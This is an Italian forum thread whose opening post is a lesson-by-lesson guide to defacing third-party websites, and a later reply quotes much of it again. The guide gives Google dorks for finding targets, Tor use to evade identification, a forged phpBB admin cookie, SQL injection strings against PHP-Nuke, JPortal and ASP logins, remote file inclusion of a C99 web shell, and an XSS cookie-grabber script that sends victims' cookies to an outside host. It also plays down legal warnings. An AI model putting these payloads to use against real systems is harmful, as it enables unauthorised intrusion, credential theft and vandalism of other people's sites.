• Regolamento Macrocategoria DEV
    Prima di aprire un topic nella Macrocategoria DEV, è bene leggerne il suo regolamento. Sei un'azienda o un hosting/provider? Qui sono anche contenute informazioni per collaborare con Sciax2 ed ottenere l'accredito nella nostra community!

Guida Ecco qui una nuova guida su come defacciare manualmente, senza programmi

ReDeface

Nuovo utente
Autore del topic
15 Aprile 2012
32
0
Miglior risposta
0
Ecco qui una nuova guida su come defacciare manualmente, senza programmi :

1° LEZIONE [ GENERALE/INTRODUTTIVA ]

Allora... prima di iniziare a defacciare bisogna imparare il significato di questo termine , defacciare un sito significa hackerarlo, bucarlo, mettere alla luce i suoi Bugs ( dall'inglese insetti ) x poi segnalarli ....
Questo procedimento necessita dell'utilizzo di varie tecniche ,sia difensive x proteggerci durante il deface, sia offensive x defacciare :

TECNICHE DIFENSIVE = le tecniche difensive servono x proteggere i nostri dati personali e quindi x impedire all'amministratore del sito di identificarci e rintracciarci , quando navighiamo in rete , quando ci logghiamo su un sito , quando scambiamo dati all'interno di un ambiente network , probabilmente il nostro IP viene loggato ovvero memorizzato e grazie alle tecniche difensive noi nascondiamo il nostro indiritto IP.

TECNICHE OFFENSIVE = le tecniche offensive invece servono x mettere alla luce bugs , questo si può fare in vari metodi ke spieghero + avanti ma x tenerci sul generale queste tecniche implicano spesso l'utilizzo di Exploits , Google Hacker etc ...

2° LEZIONE [ PROXARCI ]

In questa lezione vi spiegherò cm proxarvi ovvero cm mascherare il vostro indirizzo IP x quanto riguarda la porta 80 [HTTP] , io personalmente uso TOR e mi ci trovo bene (TOR è scaricabile nella zona download del mio sito ) . TOR necessita di una configurazione, dopo l'installazione bisogna andare (x quanto riguarda IE) in Opzioni internet -> Connessioni -> Impostazioni LAN -> selezionare "utilizza un server proxy ..." -> Avanzate -> in HTTP inserire prima localhost o 127.0.0.1 e nella porta 8118.
X verificare se il programma x mascherare il vostro IP funzioni si vada su un sito ke mostra il vostro IP (Es.
Perfavore, Entra oppure Registrati per vedere i Link!
) prima e dopo l'apertura del programma se l'indirizzo è cambiato vuol dire ke il programma funge, in caso contrario verificate la configurazione. [Sempre x quanto riguarda TOR ogni volta ke ci si vuole proxare bisogno ri selezionare nelle impostazioni lan "utilizza un server proxy..." e dopo di ke bisogna attivare prima TOR e poi Privoxy, se si lascia l'opzione selezionata e TOR disattivato internet nn fungerà è un po nosioso lo so ]
L'unico punto a sfavore nel proxarci è che la connessione sara molto piu lenta del normale , le immagini nei siti web nn le visualizzerà correttamente (nn sempre) e nn vi accedera ad MSN [ solo xk TOR e Privoxy cambiano l'ip x mantenervi anonimi e MSN si disconnette appena l'ip viene modificato ]

NOTATE BENE = NEL DEFACCIARE I SITI IL PROXARSI è FONDAMENTALE!!!

3° LEZIONE [ GOOGLE HACKER ]

In questa lezione parleremo di cm trovare siti web cn vulnerabilità utilizzando google, questo procedimento si chiama google hacking cioè la parte "oscura" di google....
Infatti inserendo alcune stringhe chiamate query potrete trovare password , database contenenti qualsiasi tipi di dati etc...
ECCO LE QUERY:

intitle: Trova le pagine contenenti nel proprio titolo la parola chiave specificata
Esempio: intitle:xhtml

allintitle: Restituisce le pagine che contengono nel titolo tutte le parole specificate
Esempio: allintitle:xhtml tutorials

inurl: Limita i risultati alle pagine contenenti una determinata parola nell'URL
Esempio: inurl:css

allinurl: Limita i risultati alle pagine contenenti tutte le parole specificate nel proprio URL
Esempio: allinurl:css design

intext: Restituisce le pagine che contengono nel testo la parola chiave specificata
Esempio: intext:blog

allintext: Limita i risultati alla pagine che contengono nel testo tutte le parole specificate
Esempio: allintext:eric meyer

link: Ricerca le pagine Web che contengono collegamenti al link specificato
Esempio: link:HTML.it

inanchor: Ricerca negli anchor dei link presenti nelle pagine
Esempio: inanchor:linux

site: Restringe la ricerca ad un sito o ad un dominio di livello superiore
Esempi: site:com o site:it o site:Red Hat | The World's Open Source Leader

cache: Trova una copia della pagina che Google ha indicizzato nella propria cache. Utile quando le pagine non sono più online
Esempio: cache:
Perfavore, Entra oppure Registrati per vedere i Link!


filetype: o ext: Limita i risultati ad un documento avente una determinata estensione di file (.doc, .pdf, .rtf, .pl, .sh, .xls, eccetera). Esempio: filetypel

define: Fornisce la descrizione di un termine ed i link ad esso correlati
Esempio: define:worm

related: Cerca pagine simili o affini alla pagina specificata
Esempio: related:HTML.it

info: Si ottengono ulteriori informazioni e link su un URL specificato. Fondamentale per tale descrizione è l'uso accorto dei metatag
Esempio: info:World Wide Web Consortium (W3C)

(Nota bene: non devono esservi spazi fra i due punti e la parola chiave specificata. Google non è case-sensitive, quindi è indifferente rispettare le maiuscole e le minuscole.)

QUERY + COMUNI X TROVARE VULNERABILITA :
CODICE:

allinurl:admin.php site:.edu
filetype: .ps, .xls, .txt, .ppt, .asp, ...
"Index of /password"
"Index of /admin"
"Index of /root"
inurl:login\admin.asp
inurl:admin\login.asp
allintitle: "index of/admin"
intitle:"Index of" passwd passwd.bak
intitle:"Index of" default.asp
intitle:"Index of" htimage.exe
intitle:index.of passlist
intitle:"Index of" .bash_history
intitle:"Index of" .sh_history
intitle:"Index of" fpcount.exe
intitle:"Index of" default.asp\
intitle:"Index of" stats.html
"powered by openbsd" +"powered by apache"
"Powered by phpBB 2.0.0"


4° LEZIONE [ DEFACCIARE FORUM PHPBB ]

Allora inizamo a studiare una la prima tecnica è molto semplice e serve x defacciare i forum PHPBB
semplicemente cambiando il codice guest dell'admin nel file dei cookies
X defacciare forum PHPBB esiste anke un programma di nome PHPBB DEFACER ke defaccia forum cn versione inferiore alla 2.0.10 in cui vi è questo bug ( Programma scaricabile nella sezione download del mio sito ).
Allora innanzi tutto bisogna cercare forum vulnerabili come fare ? ricordate la lezione precedente riguardante google hacker bene ora ci serve
andate su google e scrivete Powered by phpbb 1.0.12
Ah 1 consiglio x esperienza personale i link cn + probabilita di deface sono ad esempio :
Perfavore, Entra oppure Registrati per vedere i Link!
e
Perfavore, Entra oppure Registrati per vedere i Link!
quando li trovate cosi togliete tutto cio che c'è dopo il ? e tornate alla index
adesso andate nei vostri cookies e cercate il nome del forum che volete defacciare appena aperto dovrebbe esserci una stringa del tipo phpbb2mysql_data e affianco un codice ke può variare voi tagliate quel codice e ci inserite
CODICE:

a%3A27Bs%3A1122autologinid%22%3Bb%3A1%3A622userid% 22%3A1222%227D

[ se ne codice guest trovate gia questa stringa vuol dire che il forum nn è vulnerabile e niente da fare ]
ora salvate e chiudete tutte le pagine internet aperte in modo tale da far aggiornare i cookies
dopo di che riaprite il forum e dovreste essere loggati cm admin)
A volte vi sono dei problemi ovvero l'amministratore del sito potrebbe inserire x motivi di sicurezza un'altro account admin senza poteri e quindi nn potrete fare nulla.
Penso che vi sarete chiesti , ma questo codice cm fa a farci loggare cm admin ? se nn ve lo siete chiesti vi rispondo lo stesso vedete dove c'è scritto autologinid bene la stringa successiva attiva la modalita autologin mentre la stringa successiva a userid (penso che lo abbiate intuito ) si tratta dell'id dell'account admin facile questa vero ? ora passiamo ad altro









5° LEZIONE [ DEFACCIARE SITI PHP-NUKE ]

Adesso spiegherò cm defacciare siti php-nuke tramite un attakko sql-inject
(l'sql-inject è l'inserimento di codice sql grazie al quale si ottengono dati come password etc )
in questo caso dopo l'inserimento della stringa sql il sito dovrebbe darci le password criptate in md5 degli admin del sito
mettiamo tutto in pratica
cerchiamo tramite google hacker siti potenzialmente vulnerabili cn varie stringhe es:
inurl:index.php?name=Search
inurl:index.php?action=Search
inurl:modules.php?name=Search
etc etc...
una volta trovato l'elenco dei siti aprendoli vi dovrebbe visualizzare il modulo di ricerca del sito ( l'admin potrebbe disattivare i moduli di un sito quindi se appena aprite la pagina viene fuori una scritta del tipo Modulo non attivo nn si puo sfruttare questo bug ) voi inserite questa stringa :
p0hh0nsee%') UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/*
e clikkate su cerca, se l'attakko è andato a buon fine il sito vi dovrebbe restituire una pagina cn le password criptate in md5
ok...ma se nn ha funzionato ?
bene se nn ha funzionato vuol dire che il sito nn è vulnerabile ad attakki nel modulo search e quindi proviamo cn un'altro modulo vulnerabile cm il modulo top10
facciamo la stessa cosa di prima...
google hacker inserendo le strighe ad esempio:
inurl:modules.php?name=Top
inurl:index.php?name=Top
etc etc...
una volta trovato il sito della prossima vittima inserite affianco al link questa stringa:
CODICE:
&querylang=%20WHERE%201=2%20UNION%20ALL%20SELEC T%2 01,pwd,1,1%20FROM%20nuke_authors

quindi il link finale risulterà :
CODICE:
Perfavore, Entra oppure Registrati per vedere i Link!


adesso se tutto ha funzionato correttamente nella pagina dei sondaggi dovremmo trovare le md5
ATTENZIONE:
A VOLTE DOPO INSERITA QUESTA STRINGA IL SITO RISPONDE CN SCRITTE DEL TIPO OPERAZIONE ILLEGALE , VERRANNO CONTATTATE LE AUTORITA E COSE DEL GENERE MA STATE TRANQUILLI NN è NIENTE DI GRAVE...ALMENO DI SOLITO...
Ma se anke questo metodo nn funzionasse ?
beh si puo sempre provare cn un altro metodo , meno "produttivo" di qll precedenti xk cn questo bug è possibile rubare i cookie dell'admin ma di solito appena vengono trovate queste vulnerabilita ci si limita a segnalare , questo attakko si chiama XSS Cross Site Scripting [spiegato meglio + avanti]
2 moduli di PHP-NUKE sono vulnerabili a questo attakko qll dei Downloads e qll dei Web_Links (se nn sono gia stati fixati)
Andando nelle pagine di questi 2 moduli si troverà una cosa in comune , entrambi hanno un text x la ricerca , inserendo all'interno di questo text un iframe è possibile effettuare un attakko XSS...adesso mi spiego meglio...
prima di tutto bisogna creare un file cn dentro una stringa simile a questa :
CODICE:
<script>alert("lordhalo");</script>

salvate il file cm un file immagine e caricatelo su uno spazio web
nel nostro esempio carikeremo il file XSS.gif (cn dentro lo script) sul mio spazio altervista ovvero
Perfavore, Entra oppure Registrati per vedere i Link!

adesso nn ci resta che creare la stringa iframe che in questo caso sarà :
CODICE:
<iframe src=http://www.lordhalo.altervista.org/XSS.gif>

cioè l'iframe fa in modo di caricare nella pagina l'immagine cn dentro lo script e se il sito sara vulnerabile vi stamperà a schermo lo script eseguendolo e in questo caso verrà fuori una schermata cn scritto lordhalo (testo ovviamente modificabile)
tutto ciò che rigurda gli attakki XSS verra spiegato + avanti in un capitolo ,a loro, interamente dedicato.

L'SQL Inject è una tecnica hacker k attakka tutte le applicazioni web che si basano su un database SQL.
L'attakkante utilizza alcune query SQL inviate alla pagina del sito web vulnerabile x ottenere dati come password etc.


6° LEZIONE [ ASP INJECT ]---------

Ekkoci giunti fin qui...
Questa tecnica tra l'altro molto semplice serve x defacciare siti ASP
Come prima cosa bisogna trovare pagine di login dell'admin in siti ASP
quindi cm al solito alla ricerca !! questa volta utiliziamo le stringhe
CODICE:
inurl:login\admin.asp
inurl:admin\login.asp
inurl:admin\admin.asp
inurl:amministrazione\login.asp
etc etc

una volta trovata la pagine si inserisce:
CODICE:
user: admin [o qll che si vuole xk la stringa User è indifferente]
pass:' or '
oppure
pass:'or'
è la stessa cosa...

se il sito è vulnerabile dovreste essere loggati cm admin
Questa tecnica fa parte della classificazione
SQL Inject

7° [ LEZIONE SCANNERIZZARE/RACCOGLIERE INFO ]

Bene iniziamo prima di tutto dobbiamo trovare l'ip del server su cui è hostato il sito da defacciare
cm si fa ?
basta aprire il prompt di DOS (START->ESEGUI scrivete CMD)
e mettendo il caso che il sito da defacciare sia
Perfavore, Entra oppure Registrati per vedere i Link!
nel prompt dovete digitare:
ping pippoclub.it
oppure
ping
Perfavore, Entra oppure Registrati per vedere i Link!


e lui vi restituira una pagina cn scritte simili a queste :
CODICE:
Esecuzione di Ping pippoclub.it [ 123.45.6.78] con 32 byte di dati :
Risposta da 123.45.6.78: byte=32 durata=Xms TTL=X
Risposta da 123.45.6.78: byte=32 durata=Xms TTL=X
Risposta da 123.45.6.78: byte=32 durata=Xms TTL=X
Risposta da 123.45.6.78: byte=32 durata=Xms TTL=X

N.B:
-logicamente 123.45.6.78 è un IP a caso ma dopo l'esecuzione del ping è quello l'IP che dovrete prendere
-le X sostituiscono dei numeri che possono variare e Xms sarebbe la durata del ping in millisecondi

adesso ottenuto l'ip che fare ?
beh semplice bisogna cercare maggiori info possibili sul sito eseguendo un WHOIS
Con il WHOIS è possibile prendere i dati riguardanti il dominio del sito visto che tutti i domini a pagamento sono registrati
eseguire un WHOIS è molto semplice basta cercare un sito che offra questa possibilita e inserirvi i dati che abbiamo in questo caso l'ip
e ora avrete ottenuto dei dati sul sito vittima alcuni utili alcuni meno in caso contrario provate a cambiare database
dopo questo passaggio (nn fondamentale) dobbiamo disperatamente ottenere altri dati riguardanti la sicurezza e le falle del sito cm fare ?
ci sono 2 modi
-scannerizzare il sito cn programmi che rilevano bug
-port scanner ( spero che sappiate tutti che cos'è e cm funge senno lasciate xdere!)
Cn il primo è possibile ottenere i bug del sito e sfruttarli ma in caso contrario ? cioè se il programma nn trovasse bug ? in tal caso bisogna passare alla seconda opzione
eseguiamo una scannerizzazione del sito e verifichiamo le porte aperte
adesso mettiamo il caso che il server del sito abbia queste porte aperte

21 - FTP

80 - HTTP

139 - NETBIOS SESSION

445 - Microsof Ds

in questo caso dobbiamo cercare un modo x sfruttarle e cm fare ? beh ci sono sempre i metodi tradizionali attakkare tramite netbios , ftp etc etc..
ma se questo nn funziona ? in questo caso utilizzeremo gli EXPLOITS !!
(spero che sappiate tutti che cosa sono gli exploits e ke abbiate delle nozioni fondamentali su di essi)
ma cm trovarli ? semplicissimo andate su siti cm
Perfavore, Entra oppure Registrati per vedere i Link!
e cercate exploit che fanno al caso vostro grazie alle informazioni ricavate cn il WHOIS il port scanner e l'analisi cn il software cerca bug nn dev'essere difficile
una volta trovati provate,provate e riprovate


8° LEZIONE [ RFI ]

In questo capitolo si parla di RFI !! (Remote File Inclusion)(Remote File Include)
quindi utilizzare l'inclusione di file sfruttando spesso variabili nn sicure...
La C99 è una shell fatta in php che una volta inserita in un sito web vi dara la possibilita di avere davanti un pannello FTP cn molte opzioni
innanzitutto
bisogna uppare la shell su un vostro sito rinominandola in: (dopo spieghero il xk)
CODICE:
shell.jpg
C99.txt
shelc99.gif

insomma cm volete tranne che .PHP
adesso dovete cercare siti vulnerabili e cm al solito google è un buon amico
Query di Es.
CODICE:

Inurl:index.php?Conf=

una volta trovata la lista di siti apritene uno e inserite dopo "Conf=" (la variabile) il link della shell
ipotizzando che il link della shell sia
Perfavore, Entra oppure Registrati per vedere i Link!

Es.
Sitovittima.it
e cosi dovreste avere la pag cn la c99 davanti !!!
pikkola parentesi Conf è una variabile cm un'altra e index.php è la pagina principale nel sito , inserendo quel url si "carichera" la shell all'interno della pagina
se volete avere maggiori info sugli url andate su
Perfavore, Entra oppure Registrati per vedere i Link!
e inserite la stringa remote file inclusion oremote file include
L'estensione della shell nn dev'essere php xk noi
vogliamo che una volta inserito il link della shell
sia eseguita sul sito della vittima e nn interpretata


9° LEZIONE [ JPORTAL ]

In questo capitolo ci occuperemo dei siti in JPORTAL!
cerchiamo siti vulnerabili cn google
basta inserire
POWERED BY JPORTAL
apritene uno e inserite affianco al sito:

print.php?what=article&id=X AND 1=0 UNION SELECT id,id,nick,pass,id,id,id,id,id from admins LIMIT 1
Es.
Sitovittima.it AND 1=0 UNION SELECT id,id,nick,pass,id,id,id,id,id from admins LIMIT 1
Nella X va inserito il numero dell'ID del utente di cui si vuole trovare la pass (in questo caso l'admin) che di solito è 1,2,3,4,5,6,7
Nn dubito della vostra intelligenza ma preferisco spericificare ankora meglio cn un'altro esempio finale)
Es.1
Sitovittima.it AND 1=0 UNION SELECT id,id,nick,pass,id,id,id,id,id from admins LIMIT 1

Es.2
Sitovittima.it AND 1=0 UNION SELECT id,id,nick,pass,id,id,id,id,id from admins LIMIT 1

Es.3
Sitovittima.it AND 1=0 UNION SELECT id,id,nick,pass,id,id,id,id,id from admins LIMIT 1

se il sito è vulnerabile dovrebbe uscire na pagina cn l'user e pass del'ID che abbiamo inserito nn hasate
Il resto è intuibile...no?(ihih)
Anke questo attakko fa parte della classificazione
SQL Inject

10° LEZIONE [ DEFACCIARE I GUESTBOOK ]

Questa vulnerabilita è molto simile a qll nelle piattaforme ASP
Cm al solito cercate pagine vulnerabili cn google
Query:
inurl:guestbook/admin/login.php
inurl:guestbook/admin.php
Poi usate un po di fantasia...
Alla schermata di login dell'admin del guestbook inserite questi dati:
CODICE:

USER: 'or 'jr7'='jr7' /*

PASSWORD: qualsiasi
In questo caso, al contrario dell SQL Inject sulle piattaforme ASP, la stringa nulla è qll della password
A questo punto se il sito sara' vulnerabile vi troverete di fronte il pannello di amministrazione del guestbook


11° LEZIONE [ ATTAKKO XSS ]

In questo capitolo ci occuperemo del bug XSS!
prima un po di teoria l'attakko XSS o CSS significa Cross Site Scripting , viene chiamato XSS xk ci si potrebbe confondere cn il CSS che sarebbe Cascading Style Sheets , che assolutamente nn centra nulla , l'attakko viene spesso effettuato a motori di ricerca , i quali (quelli kn il bug) una volta inserita la stringa da ricercare la stampano direttamente a pagina senza "filtrarla" ad Es.
se io volessi cercare CIAO BELLO in un motore di ricerca e nn trovassi niente la pagina risponderebbe
Non è stato trovato alcun risultato con la parola CIAO BELLO
e in questo caso sara possibile inserire al posto della stringa CIAO BELLO un javascript )
adesso ricapitoliamo )
Mettiamo il caso di aver trovato un sito potenzialmente vulnerabile e vorremmo approfittarne, cm fare? basta inserire nella stringa della ricerca un javascript
CODICE:

Es.
<script language=JavaScript> window.alert("LoRdHaLo"); </script>

in caso di presenza del bug una volta avviata la ricerca vi si aprira una finestra a stile alert cn scritto LoRdHaLo ( testo ovviamente modificabile)
cn la presenza di questo bug nn solo è possibile far aprire qll finestrina ma è possibile reindirizzare il visitatore della pagina su altri siti a nostro piacimento , magari siti che rubano cookies e/o loggano l'IP ecc
Adesso spieghero cm utilizzare una vulnerabilita di questo tipo eseguendo un Cookies Grabber
Inserire in un pagina PHP questo codice :
CODICE:
<?PHP
$cookie = $_GET['data'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.txt', 'a');
fwrite($fp, 'Cookie: '.$cookie.'
IP: ' .$ip. '
Date and Time: ' .$date. '
Referer: '.$referer.'


');
fclose($fp);
?>

Ovvero questa pagina una volta aperta loggera i cookies e l'IP della vittima in un file di nome cookies.txt...
Adesso salviamo la pagina cn il nome di cookie.php e uppiamola sul nostro sito in questo caso
Perfavore, Entra oppure Registrati per vedere i Link!

Dopo aver inserito lo script : <script language=JavaScript> window.alert("SIOUX83"); </script>
Il link della pagina dovrebbe essere simile a questo
CODICE:

http://www.sitovittima.com/ricerca.php?k...<script language=JavaScript> window.alert("LoRdHaLo"); </script>

ma cm redirezionare la vittima sulla pagina in modo da rubargli i cookie ?
beh semplice, innanzitutto dobbiamo creare il link da dare alla vittima sostituendo il javascript

CODICE:
<script language=JavaScript> window.alert("LoRdHaLo"); </script> cn questo
<script language="JavaScript"> window.location="http://www.sitomio.net/cookie.php?cooked="+document
:emoji_smiley:
 
Riferimento: Ecco qui una nuova guida su come defacciare manualmente, senza programmi

Lo sai che in italiano la K non è presente nell'alfabeto e per tanto si usa una comune lettera come la C?

Sposto in Habbo Hacking.
 
Riferimento: Ecco qui una nuova guida su come defacciare manualmente, senza programmi

Lo sai che in italiano la K non è presente nell'alfabeto e per tanto si usa una comune lettera come la C?

Sposto in Habbo Hacking.

Ahahaha. Concordo pienamente con te ho sempre odiato le *K*
 
Riferimento: Ecco qui una nuova guida su come defacciare manualmente, senza programmi

Ecco qui una nuova guida su come defacciare manualmente, senza programmi :

1° LEZIONE [ GENERALE/INTRODUTTIVA ]

Allora... prima di iniziare a defacciare bisogna imparare il significato di questo termine , defacciare un sito significa hackerarlo, bucarlo, mettere alla luce i suoi Bugs ( dall'inglese insetti ) x poi segnalarli ....
Questo procedimento necessita dell'utilizzo di varie tecniche ,sia difensive x proteggerci durante il deface, sia offensive x defacciare :

TECNICHE DIFENSIVE = le tecniche difensive servono x proteggere i nostri dati personali e quindi x impedire all'amministratore del sito di identificarci e rintracciarci , quando navighiamo in rete , quando ci logghiamo su un sito , quando scambiamo dati all'interno di un ambiente network , probabilmente il nostro IP viene loggato ovvero memorizzato e grazie alle tecniche difensive noi nascondiamo il nostro indiritto IP.

TECNICHE OFFENSIVE = le tecniche offensive invece servono x mettere alla luce bugs , questo si può fare in vari metodi ke spieghero + avanti ma x tenerci sul generale queste tecniche implicano spesso l'utilizzo di Exploits , Google Hacker etc ...

2° LEZIONE [ PROXARCI ]

In questa lezione vi spiegherò cm proxarvi ovvero cm mascherare il vostro indirizzo IP x quanto riguarda la porta 80 [HTTP] , io personalmente uso TOR e mi ci trovo bene (TOR è scaricabile nella zona download del mio sito ) . TOR necessita di una configurazione, dopo l'installazione bisogna andare (x quanto riguarda IE) in Opzioni internet -> Connessioni -> Impostazioni LAN -> selezionare "utilizza un server proxy ..." -> Avanzate -> in HTTP inserire prima localhost o 127.0.0.1 e nella porta 8118.
X verificare se il programma x mascherare il vostro IP funzioni si vada su un sito ke mostra il vostro IP (Es.
Perfavore, Entra oppure Registrati per vedere i Link!
) prima e dopo l'apertura del programma se l'indirizzo è cambiato vuol dire ke il programma funge, in caso contrario verificate la configurazione. [Sempre x quanto riguarda TOR ogni volta ke ci si vuole proxare bisogno ri selezionare nelle impostazioni lan "utilizza un server proxy..." e dopo di ke bisogna attivare prima TOR e poi Privoxy, se si lascia l'opzione selezionata e TOR disattivato internet nn fungerà è un po nosioso lo so ]
L'unico punto a sfavore nel proxarci è che la connessione sara molto piu lenta del normale , le immagini nei siti web nn le visualizzerà correttamente (nn sempre) e nn vi accedera ad MSN [ solo xk TOR e Privoxy cambiano l'ip x mantenervi anonimi e MSN si disconnette appena l'ip viene modificato ]

NOTATE BENE = NEL DEFACCIARE I SITI IL PROXARSI è FONDAMENTALE!!!

3° LEZIONE [ GOOGLE HACKER ]

In questa lezione parleremo di cm trovare siti web cn vulnerabilità utilizzando google, questo procedimento si chiama google hacking cioè la parte "oscura" di google....
Infatti inserendo alcune stringhe chiamate query potrete trovare password , database contenenti qualsiasi tipi di dati etc...
ECCO LE QUERY:

intitle: Trova le pagine contenenti nel proprio titolo la parola chiave specificata
Esempio: intitle:xhtml

allintitle: Restituisce le pagine che contengono nel titolo tutte le parole specificate
Esempio: allintitle:xhtml tutorials

inurl: Limita i risultati alle pagine contenenti una determinata parola nell'URL
Esempio: inurl:css

allinurl: Limita i risultati alle pagine contenenti tutte le parole specificate nel proprio URL
Esempio: allinurl:css design

intext: Restituisce le pagine che contengono nel testo la parola chiave specificata
Esempio: intext:blog

allintext: Limita i risultati alla pagine che contengono nel testo tutte le parole specificate
Esempio: allintext:eric meyer

link: Ricerca le pagine Web che contengono collegamenti al link specificato
Esempio: link:HTML.it

inanchor: Ricerca negli anchor dei link presenti nelle pagine
Esempio: inanchor:linux

site: Restringe la ricerca ad un sito o ad un dominio di livello superiore
Esempi: site:com o site:it o site:Red Hat | The World's Open Source Leader

cache: Trova una copia della pagina che Google ha indicizzato nella propria cache. Utile quando le pagine non sono più online
Esempio: cache:
Perfavore, Entra oppure Registrati per vedere i Link!


filetype: o ext: Limita i risultati ad un documento avente una determinata estensione di file (.doc, .pdf, .rtf, .pl, .sh, .xls, eccetera). Esempio: filetypel

define: Fornisce la descrizione di un termine ed i link ad esso correlati
Esempio: define:worm

related: Cerca pagine simili o affini alla pagina specificata
Esempio: related:HTML.it

info: Si ottengono ulteriori informazioni e link su un URL specificato. Fondamentale per tale descrizione è l'uso accorto dei metatag
Esempio: info:World Wide Web Consortium (W3C)

(Nota bene: non devono esservi spazi fra i due punti e la parola chiave specificata. Google non è case-sensitive, quindi è indifferente rispettare le maiuscole e le minuscole.)

QUERY + COMUNI X TROVARE VULNERABILITA :
CODICE:

allinurl:admin.php site:.edu
filetype: .ps, .xls, .txt, .ppt, .asp, ...
"Index of /password"
"Index of /admin"
"Index of /root"
inurl:login\admin.asp
inurl:admin\login.asp
allintitle: "index of/admin"
intitle:"Index of" passwd passwd.bak
intitle:"Index of" default.asp
intitle:"Index of" htimage.exe
intitle:index.of passlist
intitle:"Index of" .bash_history
intitle:"Index of" .sh_history
intitle:"Index of" fpcount.exe
intitle:"Index of" default.asp\
intitle:"Index of" stats.html
"powered by openbsd" +"powered by apache"
"Powered by phpBB 2.0.0"


4° LEZIONE [ DEFACCIARE FORUM PHPBB ]

Allora inizamo a studiare una la prima tecnica è molto semplice e serve x defacciare i forum PHPBB
semplicemente cambiando il codice guest dell'admin nel file dei cookies
X defacciare forum PHPBB esiste anke un programma di nome PHPBB DEFACER ke defaccia forum cn versione inferiore alla 2.0.10 in cui vi è questo bug ( Programma scaricabile nella sezione download del mio sito ).
Allora innanzi tutto bisogna cercare forum vulnerabili come fare ? ricordate la lezione precedente riguardante google hacker bene ora ci serve
andate su google e scrivete Powered by phpbb 1.0.12
Ah 1 consiglio x esperienza personale i link cn + probabilita di deface sono ad esempio :
Perfavore, Entra oppure Registrati per vedere i Link!
e
Perfavore, Entra oppure Registrati per vedere i Link!
quando li trovate cosi togliete tutto cio che c'è dopo il ? e tornate alla index
adesso andate nei vostri cookies e cercate il nome del forum che volete defacciare appena aperto dovrebbe esserci una stringa del tipo phpbb2mysql_data e affianco un codice ke può variare voi tagliate quel codice e ci inserite
CODICE:

a%3A27Bs%3A1122autologinid%22%3Bb%3A1%3A622userid% 22%3A1222%227D

[ se ne codice guest trovate gia questa stringa vuol dire che il forum nn è vulnerabile e niente da fare ]
ora salvate e chiudete tutte le pagine internet aperte in modo tale da far aggiornare i cookies
dopo di che riaprite il forum e dovreste essere loggati cm admin)
A volte vi sono dei problemi ovvero l'amministratore del sito potrebbe inserire x motivi di sicurezza un'altro account admin senza poteri e quindi nn potrete fare nulla.
Penso che vi sarete chiesti , ma questo codice cm fa a farci loggare cm admin ? se nn ve lo siete chiesti vi rispondo lo stesso vedete dove c'è scritto autologinid bene la stringa successiva attiva la modalita autologin mentre la stringa successiva a userid (penso che lo abbiate intuito ) si tratta dell'id dell'account admin facile questa vero ? ora passiamo ad altro









5° LEZIONE [ DEFACCIARE SITI PHP-NUKE ]

Adesso spiegherò cm defacciare siti php-nuke tramite un attakko sql-inject
(l'sql-inject è l'inserimento di codice sql grazie al quale si ottengono dati come password etc )
in questo caso dopo l'inserimento della stringa sql il sito dovrebbe darci le password criptate in md5 degli admin del sito
mettiamo tutto in pratica
cerchiamo tramite google hacker siti potenzialmente vulnerabili cn varie stringhe es:
inurl:index.php?name=Search
inurl:index.php?action=Search
inurl:modules.php?name=Search
etc etc...
una volta trovato l'elenco dei siti aprendoli vi dovrebbe visualizzare il modulo di ricerca del sito ( l'admin potrebbe disattivare i moduli di un sito quindi se appena aprite la pagina viene fuori una scritta del tipo Modulo non attivo nn si puo sfruttare questo bug ) voi inserite questa stringa :
p0hh0nsee%') UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/*
e clikkate su cerca, se l'attakko è andato a buon fine il sito vi dovrebbe restituire una pagina cn le password criptate in md5
ok...ma se nn ha funzionato ?
bene se nn ha funzionato vuol dire che il sito nn è vulnerabile ad attakki nel modulo search e quindi proviamo cn un'altro modulo vulnerabile cm il modulo top10
facciamo la stessa cosa di prima...
google hacker inserendo le strighe ad esempio:
inurl:modules.php?name=Top
inurl:index.php?name=Top
etc etc...
una volta trovato il sito della prossima vittima inserite affianco al link questa stringa:
CODICE:
&querylang=%20WHERE%201=2%20UNION%20ALL%20SELEC T%2 01,pwd,1,1%20FROM%20nuke_authors

quindi il link finale risulterà :
CODICE:
Perfavore, Entra oppure Registrati per vedere i Link!


adesso se tutto ha funzionato correttamente nella pagina dei sondaggi dovremmo trovare le md5
ATTENZIONE:
A VOLTE DOPO INSERITA QUESTA STRINGA IL SITO RISPONDE CN SCRITTE DEL TIPO OPERAZIONE ILLEGALE , VERRANNO CONTATTATE LE AUTORITA E COSE DEL GENERE MA STATE TRANQUILLI NN è NIENTE DI GRAVE...ALMENO DI SOLITO...
Ma se anke questo metodo nn funzionasse ?
beh si puo sempre provare cn un altro metodo , meno "produttivo" di qll precedenti xk cn questo bug è possibile rubare i cookie dell'admin ma di solito appena vengono trovate queste vulnerabilita ci si limita a segnalare , questo attakko si chiama XSS Cross Site Scripting [spiegato meglio + avanti]
2 moduli di PHP-NUKE sono vulnerabili a questo attakko qll dei Downloads e qll dei Web_Links (se nn sono gia stati fixati)
Andando nelle pagine di questi 2 moduli si troverà una cosa in comune , entrambi hanno un text x la ricerca , inserendo all'interno di questo text un iframe è possibile effettuare un attakko XSS...adesso mi spiego meglio...
prima di tutto bisogna creare un file cn dentro una stringa simile a questa :
CODICE:
<script>alert("lordhalo");</script>

salvate il file cm un file immagine e caricatelo su uno spazio web
nel nostro esempio carikeremo il file XSS.gif (cn dentro lo script) sul mio spazio altervista ovvero
Perfavore, Entra oppure Registrati per vedere i Link!

adesso nn ci resta che creare la stringa iframe che in questo caso sarà :
CODICE:
<iframe src=http://www.lordhalo.altervista.org/XSS.gif>

cioè l'iframe fa in modo di caricare nella pagina l'immagine cn dentro lo script e se il sito sara vulnerabile vi stamperà a schermo lo script eseguendolo e in questo caso verrà fuori una schermata cn scritto lordhalo (testo ovviamente modificabile)
tutto ciò che rigurda gli attakki XSS verra spiegato + avanti in un capitolo ,a loro, interamente dedicato.

L'SQL Inject è una tecnica hacker k attakka tutte le applicazioni web che si basano su un database SQL.
L'attakkante utilizza alcune query SQL inviate alla pagina del sito web vulnerabile x ottenere dati come password etc.


6° LEZIONE [ ASP INJECT ]---------

Ekkoci giunti fin qui...
Questa tecnica tra l'altro molto semplice serve x defacciare siti ASP
Come prima cosa bisogna trovare pagine di login dell'admin in siti ASP
